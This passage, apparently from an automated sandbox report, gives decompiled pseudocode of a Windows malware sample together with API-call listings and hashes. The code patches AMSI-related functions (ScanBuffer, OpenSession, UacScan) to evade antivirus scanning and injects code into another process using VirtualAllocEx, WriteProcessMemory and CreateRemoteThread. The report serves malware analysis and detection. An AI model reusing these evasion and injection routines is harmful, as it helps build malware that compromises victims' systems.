                                                                                                					E02183690(_v288, 0x2194598, _t698, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v296, E02174D64(_v300));
                                                                                                					_push(_v296);
                                                                                                					E02174BB0( &_v308,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v304, E02174D64(_v308));
                                                                                                					_pop(_t703); // executed
                                                                                                					E02183690(_v304, 0x2194598, _t703, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v312, E02174D64(_v316));
                                                                                                					_push(_v312);
                                                                                                					E02174BB0( &_v324,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v320, E02174D64(_v324));
                                                                                                					_pop(_t708); // executed
                                                                                                					E02183690(_v320, 0x2194598, _t708, 0x2194520); // executed
                                                                                                					E02174A98( &_v328, "kernel32");
                                                                                                					_t448 = E0217CAC8(_v328, 0x2194598, 0x8000); // executed
                                                                                                					 *0x21945ac = _t448;
                                                                                                					_t449 =  *0x21945ac; // 0x76670000
                                                                                                					 *0x21945a8 = GetProcAddress(_t449, "WriteProcessMemory");
                                                                                                					_t451 =  *0x21945ac; // 0x76670000
                                                                                                					FreeLibrary(_t451);
                                                                                                					_t453 =  *0x2194500; // 0x29000
                                                                                                					_t454 =  *0x21944fc; // 0x10410000
                                                                                                					WriteProcessMemory(_t756,  *0x2194520, _t454, _t453, 0x2194518); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v332, E02174D64(_v336));
                                                                                                					_push(_v332);
                                                                                                					E02174BB0( &_v344,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v340, E02174D64(_v344));
                                                                                                					_pop(_t715); // executed
                                                                                                					E02183690(_v340, 0x2194598, _t715, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("Initialize");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v348, E02174D64(_v352));
                                                                                                					_push(_v348);
                                                                                                					E02174BB0( &_v360,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v356, E02174D64(_v360));
                                                                                                					_pop(_t720); // executed
                                                                                                					E02183690(_v356, 0x2194598, _t720, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v364, E02174D64(_v368));
                                                                                                					_push(_v364);
                                                                                                					E02174BB0( &_v376,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v372, E02174D64(_v376));
                                                                                                					_pop(_t725); // executed
                                                                                                					E02183690(_v372, 0x2194598, _t725, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v380, E02174D64(_v384));
                                                                                                					_push(_v380);
                                                                                                					E02174BB0( &_v392,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v388, E02174D64(_v392));
                                                                                                					_pop(_t730); // executed
                                                                                                					E02183690(_v388, 0x2194598, _t730, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v396, E02174D64(_v400));
                                                                                                					_push(_v396);
                                                                                                					E02174BB0( &_v408,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v404, E02174D64(_v408));
                                                                                                					_pop(_t735); // executed
                                                                                                					E02183690(_v404, 0x2194598, _t735, 0x2194520); // executed
                                                                                                					E02185B0C(_t756, 0x2194510, E02187774, 0, 8);
                                                                                                					_t529 =  *0x2194518; // 0x71
                                                                                                					_t530 =  *0x2194500; // 0x29000
                                                                                                					NtProtectVirtualMemory(_t756,  *0x2194520, _t530, 1, _t529);
                                                                                                				}
                                                                                                				_pop(_t680);
                                                                                                				 *[fs:eax] = _t680;
                                                                                                				_push(E02188408);
                                                                                                				E021748C4( &_v408, 0x29);
                                                                                                				_t682 =  *0x2185930; // 0x2185934
                                                                                                				E02175398( &_v244, _t682);
                                                                                                				return E021748C4( &_v224, 0x35);
                                                                                                			}
                                                                                                0x02187dd6
                                                                                                0x02187ddb
                                                                                                0x02187ddd
                                                                                                0x02187de2
                                                                                                0x02187df2
                                                                                                0x02187e0a
                                                                                                0x02187e15
                                                                                                0x02187e23
                                                                                                0x02187e3b
                                                                                                0x02187e46
                                                                                                0x02187e47
                                                                                                0x02187e52
                                                                                                0x02187e5a
                                                                                                0x02187e6a
                                                                                                0x02187e70
                                                                                                0x02187e7c
                                                                                                0x02187e82
                                                                                                0x02187e87
                                                                                                0x02187e89
                                                                                                0x02187e8e
                                                                                                0x02187e93
                                                                                                0x02187e98
                                                                                                0x02187e9d
                                                                                                0x02187e9f
                                                                                                0x02187ea4
                                                                                                0x02187eb4
                                                                                                0x02187ecc
                                                                                                0x02187ed7
                                                                                                0x02187ee5
                                                                                                0x02187efd
                                                                                                0x02187f08
                                                                                                0x02187f09
                                                                                                0x02187f0e
                                                                                                0x02187f13
                                                                                                0x02187f18
                                                                                                0x02187f1d
                                                                                                0x02187f1f
                                                                                                0x02187f24
                                                                                                0x02187f29
                                                                                                0x02187f2e
                                                                                                0x02187f33
                                                                                                0x02187f35
                                                                                                0x02187f3a
                                                                                                0x02187f4a
                                                                                                0x02187f62
                                                                                                0x02187f6d
                                                                                                0x02187f7b
                                                                                                0x02187f93
                                                                                                0x02187f9e
                                                                                                0x02187f9f
                                                                                                0x02187fa4
                                                                                                0x02187fa9
                                                                                                0x02187fae
                                                                                                0x02187fb3
                                                                                                0x02187fb5
                                                                                                0x02187fc5
                                                                                                0x02187fdd
                                                                                                0x02187fe8
                                                                                                0x02187ff6
                                                                                                0x0218800e
                                                                                                0x02188019
                                                                                                0x0218801a
                                                                                                0x0218801f
                                                                                                0x02188024
                                                                                                0x02188026
                                                                                                0x02188036
                                                                                                0x0218804e
                                                                                                0x02188059
                                                                                                0x02188067
                                                                                                0x0218807f
                                                                                                0x0218808a
                                                                                                0x0218808b
                                                                                                0x02188090
                                                                                                0x02188095
                                                                                                0x02188097
                                                                                                0x021880a7
                                                                                                0x021880bf
                                                                                                0x021880ca
                                                                                                0x021880d8
                                                                                                0x021880f0
                                                                                                0x021880fb
                                                                                                0x021880fc
                                                                                                0x0218810c
                                                                                                0x0218811c
                                                                                                0x02188121
                                                                                                0x0218812b
                                                                                                0x02188136
                                                                                                0x0218813b
                                                                                                0x02188141
                                                                                                0x0218814b
                                                                                                0x02188151
                                                                                                0x0218815b
                                                                                                0x02188161
                                                                                                0x02188166
                                                                                                0x02188168
                                                                                                0x02188178
                                                                                                0x02188190
                                                                                                0x0218819b
                                                                                                0x021881a9
                                                                                                0x021881c1
                                                                                                0x021881cc
                                                                                                0x021881cd
                                                                                                0x021881d2
                                                                                                0x021881d7
                                                                                                0x021881d9
                                                                                                0x021881e9
                                                                                                0x02188201
                                                                                                0x0218820c
                                                                                                0x0218821a
                                                                                                0x02188232
                                                                                                0x0218823d
                                                                                                0x0218823e
                                                                                                0x02188243
                                                                                                0x02188248
                                                                                                0x0218824a
                                                                                                0x0218825a
                                                                                                0x02188272
                                                                                                0x0218827d
                                                                                                0x0218828b
                                                                                                0x021882a3
                                                                                                0x021882ae
                                                                                                0x021882af
                                                                                                0x021882b4
                                                                                                0x021882b9
                                                                                                0x021882bb
                                                                                                0x021882cb
                                                                                                0x021882e3
                                                                                                0x021882ee
                                                                                                0x021882fc
                                                                                                0x02188314
                                                                                                0x0218831f
                                                                                                0x02188320
                                                                                                0x02188325
                                                                                                0x0218832a
                                                                                                0x0218832c
                                                                                                0x0218833c
                                                                                                0x02188354
                                                                                                0x0218835f
                                                                                                0x0218836d
                                                                                                0x02188385
                                                                                                0x02188390
                                                                                                0x02188391
                                                                                                0x021883a6
                                                                                                0x021883ab
                                                                                                0x021883b3
                                                                                                0x021883bd
                                                                                                0x021883bd
                                                                                                0x021883c4
                                                                                                0x021883c7
                                                                                                0x021883ca
                                                                                                0x021883da
                                                                                                0x021883e5
                                                                                                0x021883eb
                                                                                                0x02188400

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,02188401,?,?,?,?,00000000,00000000), ref: 021877DA
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                • GetProcAddress.KERNEL32(76670000,VirtualFree), ref: 02187C62
                                                                                                • FreeLibrary.KERNEL32(76670000,76670000,VirtualFree,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598,02188438,ScanBuffer,02194598,02188438,UacScan), ref: 02187C72
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,76670000,76670000,VirtualFree,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598,02188438,ScanBuffer), ref: 02187C81
                                                                                                • VirtualAllocEx.KERNEL32(?,-01D94524,00029000,00003000,00000040), ref: 02187CA7
                                                                                                • VirtualAlloc.KERNEL32(-01D94524,00029000,00003000,00000040,ScanBuffer,02194598,02188438,021884BC,021884B0,02194598,021884A4,02188498,0218848C,02188480,02194598,02188438), ref: 02187A29
                                                                                                  • Part of subcall function 0217CAC8: SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                  • Part of subcall function 0217CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                • GetProcAddress.KERNEL32(76670000,WriteProcessMemory), ref: 02188131
                                                                                                • FreeLibrary.KERNEL32(76670000,76670000,WriteProcessMemory,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598,02188438,021884BC,021884B0,02194598,021884A4), ref: 02188141
                                                                                                • WriteProcessMemory.KERNEL32(?,10410000,10410000,00029000,02194518,76670000,76670000,WriteProcessMemory,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598), ref: 0218815B
                                                                                                  • Part of subcall function 02185B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,04FA0000,04A80000,00000000,02194534), ref: 02185B58
                                                                                                  • Part of subcall function 02185B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02185B68
                                                                                                  • Part of subcall function 02185B0C: ReadProcessMemory.KERNEL32(?,04A80000,?,?,02194530,00000000,000000FF), ref: 02185B7E
                                                                                                • NtProtectVirtualMemory.N(?,00029000,00029000,00000001,00000071,OpenSession,02194598,02188438,ScanBuffer,02194598,02188438,OpenSession,02194598,02188438,Initialize,02194598), ref: 021883BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryMemoryVirtual$Free$AddressProcProcess$AllocLoad$CreateCurrentErrorFlushHandleInetModeModuleMoveObjectOfflineProtectReadRemoteSingleThreadWaitWrite
                                                                                                • String ID: Initialize$OpenSession$ScanBuffer$UacScan$VirtualFree$WriteProcessMemory$kernel32$teSe
                                                                                                • API String ID: 1742017062-2541080484
                                                                                                • Opcode ID: 5ecfce32a4ae5496d76aab4fa2b39547e6ba6fbed24add456cf3ac03fffcab2e
                                                                                                • Instruction ID: 28bda7a8bdbbdd1295cc0c1097c59bb9659dbe885e03b34c71e8ff61c02af36a
                                                                                                • Opcode Fuzzy Hash: 5ecfce32a4ae5496d76aab4fa2b39547e6ba6fbed24add456cf3ac03fffcab2e
                                                                                                • Instruction Fuzzy Hash: 3462E035AC02189FEB21FB64DCC0FDEB3B6AF85700F5184A6A149AB214DB70AE45CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 43%
                                                                                                			E0218773C(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi) {
                                                                                                				intOrPtr* _v0;
                                                                                                				char _v4;
                                                                                                				char _v5;
                                                                                                				char _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				char _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				char _v36;
                                                                                                				char _v40;
                                                                                                				char _v44;
                                                                                                				intOrPtr _v48;
                                                                                                				char _v52;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				char _v68;
                                                                                                				char _v72;
                                                                                                				char _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				char _v84;
                                                                                                				char _v88;
                                                                                                				char _v92;
                                                                                                				intOrPtr _v96;
                                                                                                				char _v100;
                                                                                                				char _v104;
                                                                                                				char _v108;
                                                                                                				intOrPtr _v112;
                                                                                                				char _v116;
                                                                                                				intOrPtr _v117;
                                                                                                				char _v120;
                                                                                                				char _v124;
                                                                                                				intOrPtr _v128;
                                                                                                				char _v132;
                                                                                                				char _v136;
                                                                                                				char _v140;
                                                                                                				intOrPtr _v144;
                                                                                                				char _v148;
                                                                                                				char _v152;
                                                                                                				char _v156;
                                                                                                				intOrPtr _v160;
                                                                                                				char _v164;
                                                                                                				char _v168;
                                                                                                				char _v172;
                                                                                                				char _v176;
                                                                                                				intOrPtr _v180;
                                                                                                				char _v184;
                                                                                                				char _v188;
                                                                                                				char _v192;
                                                                                                				intOrPtr _v196;
                                                                                                				char _v200;
                                                                                                				char _v204;
                                                                                                				char _v208;
                                                                                                				intOrPtr _v212;
                                                                                                				char _v216;
                                                                                                				char _v220;
                                                                                                				char _v240;
                                                                                                				char _v244;
                                                                                                				intOrPtr _v248;
                                                                                                				char _v252;
                                                                                                				char _v256;
                                                                                                				char _v260;
                                                                                                				intOrPtr _v264;
                                                                                                				char _v268;
                                                                                                				char _v272;
                                                                                                				char _v276;
                                                                                                				intOrPtr _v280;
                                                                                                				char _v284;
                                                                                                				char _v288;
                                                                                                				char _v292;
                                                                                                				intOrPtr _v296;
                                                                                                				char _v300;
                                                                                                				char _v304;
                                                                                                				char _v308;
                                                                                                				intOrPtr _v312;
                                                                                                				char _v316;
                                                                                                				char _v320;
                                                                                                				char _v324;
                                                                                                				char _v328;
                                                                                                				intOrPtr _v332;
                                                                                                				char _v336;
                                                                                                				char _v340;
                                                                                                				char _v344;
                                                                                                				intOrPtr _v348;
                                                                                                				char _v352;
                                                                                                				char _v356;
                                                                                                				char _v360;
                                                                                                				intOrPtr _v364;
                                                                                                				char _v368;
                                                                                                				char _v372;
                                                                                                				char _v376;
                                                                                                				intOrPtr _v380;
                                                                                                				char _v384;
                                                                                                				char _v388;
                                                                                                				char _v392;
                                                                                                				intOrPtr _v396;
                                                                                                				char _v400;
                                                                                                				char _v404;
                                                                                                				void* _t215;
                                                                                                				void* _t218;
                                                                                                				intOrPtr _t295;
                                                                                                				intOrPtr _t297;
                                                                                                				PVOID* _t300;
                                                                                                				void* _t396;
                                                                                                				intOrPtr _t411;
                                                                                                				struct HINSTANCE__* _t457;
                                                                                                				struct HINSTANCE__* _t458;
                                                                                                				struct HINSTANCE__* _t460;
                                                                                                				long _t462;
                                                                                                				void* _t463;
                                                                                                				long* _t538;
                                                                                                				long* _t539;
                                                                                                				struct HINSTANCE__* _t587;
                                                                                                				struct HINSTANCE__* _t588;
                                                                                                				struct HINSTANCE__* _t590;
                                                                                                				intOrPtr _t594;
                                                                                                				intOrPtr _t596;
                                                                                                				PVOID* _t599;
                                                                                                				intOrPtr* _t602;
                                                                                                				intOrPtr* _t603;
                                                                                                				intOrPtr* _t604;
                                                                                                				intOrPtr _t623;
                                                                                                				void* _t648;
                                                                                                				void* _t653;
                                                                                                				void* _t658;
                                                                                                				void* _t664;
                                                                                                				void* _t669;
                                                                                                				void* _t674;
                                                                                                				void* _t679;
                                                                                                				void* _t684;
                                                                                                				void* _t689;
                                                                                                				void* _t694;
                                                                                                				intOrPtr _t697;
                                                                                                				intOrPtr _t699;
                                                                                                				void* _t705;
                                                                                                				void* _t710;
                                                                                                				void* _t715;
                                                                                                				void* _t720;
                                                                                                				void* _t725;
                                                                                                				void* _t732;
                                                                                                				void* _t737;
                                                                                                				void* _t742;
                                                                                                				void* _t747;
                                                                                                				void* _t752;
                                                                                                				void* _t758;
                                                                                                				void* _t763;
                                                                                                				void* _t768;
                                                                                                				void* _t775;
                                                                                                				void* _t776;
                                                                                                				void* _t778;
                                                                                                				intOrPtr _t781;
                                                                                                
                                                                                                				_t776 = __esi;
                                                                                                				_t774 = __edi;
                                                                                                				_t610 = __ecx;
                                                                                                				_t607 = __ebx;
                                                                                                				_t215 = __eax +  *__eax;
                                                                                                				 *_t215 = _t215 +  *_t215;
                                                                                                				if( *_t215 < 0) {
                                                                                                					while(1) {
                                                                                                						_push(0);
                                                                                                						_t610 = _t610 - 1;
                                                                                                						if(_t610 == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_push(0);
                                                                                                					}
                                                                                                					_t9 =  &_v4;
                                                                                                					 *_t9 = _t610;
                                                                                                					_push(_t776);
                                                                                                					_v4 =  *_t9;
                                                                                                					_t775 = _t215;
                                                                                                					_push(_t778);
                                                                                                					_push(0x2188401);
                                                                                                					_push( *[fs:eax]);
                                                                                                					 *[fs:eax] = _t781;
                                                                                                					_t218 = E0217304C(0x270e);
                                                                                                					_push(_t218);
                                                                                                					L021858FC();
                                                                                                					if(_t218 == 0) {
                                                                                                						E021748F4(0x2194598, 0x218842c);
                                                                                                					} else {
                                                                                                						E021748F4(0x2194598, 0x218841c);
                                                                                                					}
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("Initialize");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v12, E02174D64(_v16));
                                                                                                					_push(_v12);
                                                                                                					E02174BB0( &_v24,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v20, E02174D64(_v24));
                                                                                                					_pop(_t648); // executed
                                                                                                					E02183690(_v20, 0x2194598, _t648, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v28, E02174D64(_v32));
                                                                                                					_push(_v28);
                                                                                                					E02174BB0( &_v40,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v36, E02174D64(_v40));
                                                                                                					_pop(_t653); // executed
                                                                                                					E02183690(_v36, 0x2194598, _t653, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v44, E02174D64(_v48));
                                                                                                					_push(_v44);
                                                                                                					E02174BB0( &_v56,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v52, E02174D64(_v56));
                                                                                                					_pop(_t658); // executed
                                                                                                					E02183690(_v52, 0x2194598, _t658, 0x2194520); // executed
                                                                                                					_v5 = 0;
                                                                                                					_push(0);
                                                                                                					_push(_v4);
                                                                                                					asm("cdq");
                                                                                                					asm("adc edx, [esp+0x4]");
                                                                                                					 *0x219451c =  *((intOrPtr*)(_v4 + 0x3c)) + _v76;
                                                                                                					 *0x2194524 = 0x10000000;
                                                                                                					do {
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push(0x2188480);
                                                                                                						_push(0x218848c);
                                                                                                						_push(0x2188498);
                                                                                                						_push(0x21884a4);
                                                                                                						_push( *0x2194598);
                                                                                                						_push(0x21884b0);
                                                                                                						_push(0x21884bc);
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v60, E02174D64(_v64));
                                                                                                						_push(_v60);
                                                                                                						E02174BB0( &_v72,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v68, E02174D64(_v72));
                                                                                                						_pop(_t664); // executed
                                                                                                						E02183690(_v68, 0x2194598, _t664, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v76, E02174D64(_v80));
                                                                                                						_push(_v76);
                                                                                                						E02174BB0( &_v88,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v84, E02174D64(_v88));
                                                                                                						_pop(_t669); // executed
                                                                                                						E02183690(_v84, 0x2194598, _t669, 0x2194520); // executed
                                                                                                						 *0x2194524 =  *0x2194524 + 0x10000;
                                                                                                						_t295 =  *0x219451c; // 0x4a7fda0
                                                                                                						_t56 = _t295 + 0x50; // 0x29000
                                                                                                						_t297 =  *0x219451c; // 0x4a7fda0
                                                                                                						_t57 = _t297 + 0x34; // 0x400000
                                                                                                						_t300 = VirtualAlloc( *_t57 +  *0x2194524,  *_t56, 0x3000, 0x40); // executed
                                                                                                						 *0x2194520 = _t300;
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("UacScan");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v92, E02174D64(_v96));
                                                                                                						_push(_v92);
                                                                                                						E02174BB0( &_v104,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v100, E02174D64(_v104));
                                                                                                						_pop(_t674); // executed
                                                                                                						E02183690(_v100, 0x2194598, _t674, 0x2194520); // executed
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("ScanBuffer");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v108, E02174D64(_v112));
                                                                                                						_push(_v108);
                                                                                                						E02174BB0( &_v120,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v116, E02174D64(_v120));
                                                                                                						_pop(_t679); // executed
                                                                                                						E02183690(_v116, 0x2194598, _t679, 0x2194520); // executed
                                                                                                						if( *0x2194520 != 0) {
                                                                                                							_push(0x2188438);
                                                                                                							_push( *0x2194598);
                                                                                                							_push("Initialize");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v124, E02174D64(_v128));
                                                                                                							_push(_v124);
                                                                                                							E02174BB0( &_v136,  *0x2194598, 0x2188438);
                                                                                                							E02174A98( &_v132, E02174D64(_v136));
                                                                                                							_pop(_t758); // executed
                                                                                                							E02183690(_v132, 0x2194598, _t758, 0x2194520); // executed
                                                                                                							_push(0x2188438);
                                                                                                							_push( *0x2194598);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v140, E02174D64(_v144));
                                                                                                							_push(_v140);
                                                                                                							E02174BB0( &_v152,  *0x2194598, 0x2188438);
                                                                                                							E02174A98( &_v148, E02174D64(_v152));
                                                                                                							_pop(_t763); // executed
                                                                                                							E02183690(_v148, 0x2194598, _t763, 0x2194520); // executed
                                                                                                							_push(0x2188438);
                                                                                                							_push( *0x2194598);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98( &_v156, E02174D64(_v160));
                                                                                                							_push(_v156);
                                                                                                							E02174BB0( &_v168,  *0x2194598, 0x2188438);
                                                                                                							E02174A98( &_v164, E02174D64(_v168));
                                                                                                							_pop(_t768); // executed
                                                                                                							E02183690(_v164, 0x2194598, _t768, 0x2194520); // executed
                                                                                                							E02174A98( &_v172, "kernel32");
                                                                                                							_t587 = E0217CAC8(_v172, 0x2194598, 0x8000); // executed
                                                                                                							 *0x21945ac = _t587;
                                                                                                							_t588 =  *0x21945ac; // 0x76670000
                                                                                                							 *0x21945a4 = GetProcAddress(_t588, "VirtualFree");
                                                                                                							_t590 =  *0x21945ac; // 0x76670000
                                                                                                							FreeLibrary(_t590);
                                                                                                							VirtualFree( *0x2194520, 0, 0x8000); // executed
                                                                                                							_t594 =  *0x219451c; // 0x4a7fda0
                                                                                                							_t100 = _t594 + 0x50; // 0x29000
                                                                                                							_t596 =  *0x219451c; // 0x4a7fda0
                                                                                                							_t101 = _t596 + 0x34; // 0x400000
                                                                                                							_t599 = VirtualAllocEx(_t775,  *_t101 +  *0x2194524,  *_t100, 0x3000, 0x40); // executed
                                                                                                							 *0x2194520 = _t599;
                                                                                                						}
                                                                                                					} while ( *0x2194520 == 0 &&  *0x2194524 <= 0x30000000);
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x2188480);
                                                                                                					_push(0x218848c);
                                                                                                					_push(0x2188498);
                                                                                                					_push(0x21884a4);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x21884b0);
                                                                                                					_push(0x21884bc);
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v176, E02174D64(_v180));
                                                                                                					_push(_v176);
                                                                                                					E02174BB0( &_v188,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v184, E02174D64(_v188));
                                                                                                					_pop(_t684); // executed
                                                                                                					E02183690(_v184, 0x2194598, _t684, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v192, E02174D64(_v196));
                                                                                                					_push(_v192);
                                                                                                					E02174BB0( &_v204,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v200, E02174D64(_v204));
                                                                                                					_pop(_t689); // executed
                                                                                                					E02183690(_v200, 0x2194598, _t689, 0x2194520); // executed
                                                                                                					_push(0x2188438);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x2188480);
                                                                                                					_push(0x218848c);
                                                                                                					_push(0x2188498);
                                                                                                					_push(0x21884a4);
                                                                                                					_push( *0x2194598);
                                                                                                					_push(0x21884b0);
                                                                                                					_push(0x21884bc);
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v208, E02174D64(_v212));
                                                                                                					_push(_v208);
                                                                                                					E02174BB0( &_v220,  *0x2194598, 0x2188438);
                                                                                                					E02174A98( &_v216, E02174D64(_v220));
                                                                                                					_pop(_t694); // executed
                                                                                                					E02183690(_v216, 0x2194598, _t694, 0x2194520); // executed
                                                                                                					_push( &_v240);
                                                                                                					E02186388(); // executed
                                                                                                					_t623 =  *0x2185930; // 0x2185934
                                                                                                					E021755FC(0x21944fc, _t623,  &_v240);
                                                                                                					if( *0x21944fc != 0) {
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push(0x2188480);
                                                                                                						_push(0x218848c);
                                                                                                						_push(0x2188498);
                                                                                                						_push(0x21884a4);
                                                                                                						_push( *0x2194598);
                                                                                                						_push(0x21884b0);
                                                                                                						_push(0x21884bc);
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v244, E02174D64(_v248));
                                                                                                						_push(_v244);
                                                                                                						E02174BB0( &_v256,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v252, E02174D64(_v256));
                                                                                                						_pop(_t705); // executed
                                                                                                						E02183690(_v252, 0x2194598, _t705, 0x2194520);
                                                                                                						_t396 =  *0x21944fc; // 0x10410000
                                                                                                						 *0x2194510 = _t396;
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push(0x2188480);
                                                                                                						_push(0x218848c);
                                                                                                						_push(0x2188498);
                                                                                                						_push(0x21884a4);
                                                                                                						_push( *0x2194598);
                                                                                                						_push(0x21884b0);
                                                                                                						_push(0x21884bc);
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v260, E02174D64(_v264));
                                                                                                						_push(_v260);
                                                                                                						E02174BB0( &_v272,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v268, E02174D64(_v272));
                                                                                                						_pop(_t710); // executed
                                                                                                						E02183690(_v268, 0x2194598, _t710, 0x2194520);
                                                                                                						_t411 =  *0x2194508; // 0x1042d450
                                                                                                						 *0x2194514 = _t411;
                                                                                                						_push(0x2188438);
                                                                                                						_push( *0x2194598);
                                                                                                						_push("Initialize");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v276, E02174D64(_v280));
                                                                                                						_push(_v276);
                                                                                                						E02174BB0( &_v288,  *0x2194598, 0x2188438);
                                                                                                						E02174A98( &_v284, E02174D64(_v288));
                                                                                                						_pop(_t715); // executed
                                                                                                						E02183690(_v284, 0x2194598, _t715, 0x2194520); // executed
                                                                                                						_push(0x2188438);
